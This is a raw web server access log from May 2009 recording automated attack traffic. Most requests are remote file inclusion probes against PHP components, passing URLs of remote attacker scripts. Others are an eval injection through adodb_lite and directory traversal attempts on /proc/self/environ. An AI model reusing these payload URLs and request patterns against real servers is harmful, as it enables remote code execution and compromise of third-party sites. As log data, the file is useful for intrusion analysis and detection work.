72.18.148.82 - - [25/May/2009:21:32:11 -0500] "GET /logs/access_log.1241654400/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:21:32:11 -0500] "GET /logs/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:21:32:11 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:32:19 -0500] "GET /logs/access_log.1238025600//conlib/local.php?cfg[path][contenido]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:33:32 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:33:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:33:34 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:33:34 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:34:08 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:38:25 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:38:31 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:39:37 -0500] "GET /logs/access_log.1236297600//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:39:37 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:40:58 -0500] "GET /logs/access_log.1241049600/netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:40:58 -0500] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:40:58 -0500] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:21:43:49 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:21:43:49 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:21:43:49 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.19.184.22 - - [25/May/2009:21:43:52 -0500] "GET /logs/access_log.1241654400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:45:25 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:21:45:26 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.11.230.36 - - [25/May/2009:21:46:32 -0500] "GET /logs/access_log.1242000000/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.11.230.36 - - [25/May/2009:21:46:32 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.11.230.36 - - [25/May/2009:21:46:32 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:21:47:25 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:21:47:25 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:21:47:25 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:47:26 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:21:47:26 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
201.232.54.48 - - [25/May/2009:21:47:44 -0500] "GET /phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:47:44 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:47:44 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:47:52 -0500] "GET /phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:47:52 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:47:52 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:49:04 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:21:49:04 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:21:49:53 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:21:49:54 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
208.64.202.134 - - [25/May/2009:21:52:45 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:21:52:45 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:21:52:45 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
38.108.70.51 - - [25/May/2009:21:54:02 -0500] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:54:02 -0500] "GET //ray/modules/global/inc/header.inc.php?sIncPath=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:54:02 -0500] "GET //ray/modules/global/inc/header.inc.php?sIncPath=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:54:06 -0500] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:54:25 -0500] "GET //ray/modules/global/inc/header.inc.php?sIncPath=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:54:25 -0500] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
84.19.184.22 - - [25/May/2009:21:56:34 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tanoto-foundation.or.id/data/tanota/README?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.23.158.226 - - [25/May/2009:21:56:59 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
65.23.158.226 - - [25/May/2009:21:57:00 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.23.158.226 - - [25/May/2009:21:57:00 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.23.158.226 - - [25/May/2009:21:57:01 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.23.158.226 - - [25/May/2009:21:57:33 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
65.23.158.226 - - [25/May/2009:21:57:37 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:21:58:20 -0500] "GET /phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:21:58:20 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:21:58:20 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:21:59:00 -0500] "GET //?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:21:59:00 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.11.230.36 - - [25/May/2009:21:59:19 -0500] "GET /logs/access_log.1239580800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.11.230.36 - - [25/May/2009:21:59:20 -0500] "GET /logs/access_log.1242086400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
151.1.32.227 - - [25/May/2009:21:59:25 -0500] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/ichaon7_oi/cmd.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
151.1.32.227 - - [25/May/2009:21:59:25 -0500] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/ichaon7_oi/cmd.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
66.175.122.228 - - [25/May/2009:21:59:31 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 200 190846 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:01:51 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:01:51 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:01:51 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:22:07:39 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:22:07:39 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:22:09:28 -0500] "GET //inc/pipe.php?HCL_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:22:09:28 -0500] "GET /logs//inc/pipe.php?HCL_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:22:09:28 -0500] "GET /logs/access_log.1239580800//inc/pipe.php?HCL_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:22:09:28 -0500] "GET /logs/access_log.1235606400//inc/pipe.php?HCL_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
220.181.7.97 - - [25/May/2009:22:10:00 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.106.7.58 - - [25/May/2009:22:17:13 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:22:17:13 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:22:17:13 -0500] "GET /phphtml.php?htmlclass_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:22:17:45 -0500] "GET /phphtml.php?htmlclass_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:22:17:45 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.106.7.58 - - [25/May/2009:22:17:45 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
151.1.32.227 - - [25/May/2009:22:18:24 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.geocities.com/ichaon7_oi/cmd.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.813"
151.1.32.227 - - [25/May/2009:22:18:24 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.geocities.com/ichaon7_oi/cmd.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.813"
195.34.78.110 - - [25/May/2009:22:19:23 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:22:19:23 -0500] "GET //becommunity/community/index.php?pageurl=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
85.18.117.101 - - [25/May/2009:22:22:12 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.18.117.101 - - [25/May/2009:22:22:12 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.18.117.101 - - [25/May/2009:22:22:17 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.18.117.101 - - [25/May/2009:22:22:23 -0500] "GET /logs/access_log.1237420800//admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.18.117.101 - - [25/May/2009:22:22:32 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.18.117.101 - - [25/May/2009:22:22:32 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.18.117.101 - - [25/May/2009:22:22:32 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.18.117.101 - - [25/May/2009:22:22:32 -0500] "GET /logs/access_log.1237420800//admin/classes/TplLoad.php?full_path_to_public_program=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.165 - - [25/May/2009:22:23:18 -0500] "GET /logs/access_log.1196985600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.43.202.66 - - [25/May/2009:22:28:18 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:22:28:18 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.43.202.66 - - [25/May/2009:22:28:18 -0500] "GET /phphtml.php?htmlclass_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.163.198 - - [25/May/2009:22:28:38 -0500] "GET /%20/login.php?dir=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
62.149.163.198 - - [25/May/2009:22:28:38 -0500] "GET /logs/%20/login.php?dir=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
62.149.163.198 - - [25/May/2009:22:28:39 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
62.149.163.198 - - [25/May/2009:22:28:39 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
62.149.163.198 - - [25/May/2009:22:28:39 -0500] "GET /%20/login.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294 "-""XXXXXX"
62.149.163.198 - - [25/May/2009:22:28:39 -0500] "GET /logs/%20/login.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""XXXXXX"
62.149.163.198 - - [25/May/2009:22:28:39 -0500] "GET /%20/login.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""XXXXXX"
62.149.163.198 - - [25/May/2009:22:28:39 -0500] "GET /logs/%20/login.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""XXXXXX"
66.175.122.228 - - [25/May/2009:22:29:28 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:32:53 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:32:53 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:32:53 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.175.122.228 - - [25/May/2009:22:34:17 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.0.54.98 - - [25/May/2009:22:34:44 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon@nsmsystem.no-ip.info/gid.txt%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
124.0.54.98 - - [25/May/2009:22:34:44 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon@nsmsystem.no-ip.info/gid.txt%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
124.0.54.98 - - [25/May/2009:22:34:44 -0500] "GET /logs/access_log.1239235200//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon@nsmsystem.no-ip.info/gid.txt%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
124.0.54.98 - - [25/May/2009:22:34:57 -0500] "GET /logs/access_log.1239235200//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon.no-ip.info/v8.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
124.0.54.98 - - [25/May/2009:22:34:57 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon.no-ip.info/v8.id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
124.0.54.98 - - [25/May/2009:22:34:57 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon.no-ip.info/v8.id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
124.0.54.98 - - [25/May/2009:22:35:19 -0500] "GET /logs/access_log.1239494400//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon@nsmsystem.no-ip.info/gid.txt%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
124.0.54.98 - - [25/May/2009:22:35:26 -0500] "GET /logs/access_log.1239494400//ktmllite/includes/ktedit/toolbar.php?dirDepth=ftp://brandon:brandon.no-ip.info/v8.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
65.55.106.230 - - [25/May/2009:22:35:48 -0500] "GET /logs/access_log.1128124800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.64.202.134 - - [25/May/2009:22:37:03 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:22:37:03 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:22:37:03 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.64.202.134 - - [25/May/2009:22:37:04 -0500] "GET /logs/access_log.1240790400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:22:37:07 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:22:37:07 -0500] "GET /logs/access_log.1233187200//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:22:37:07 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:22:37:11 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
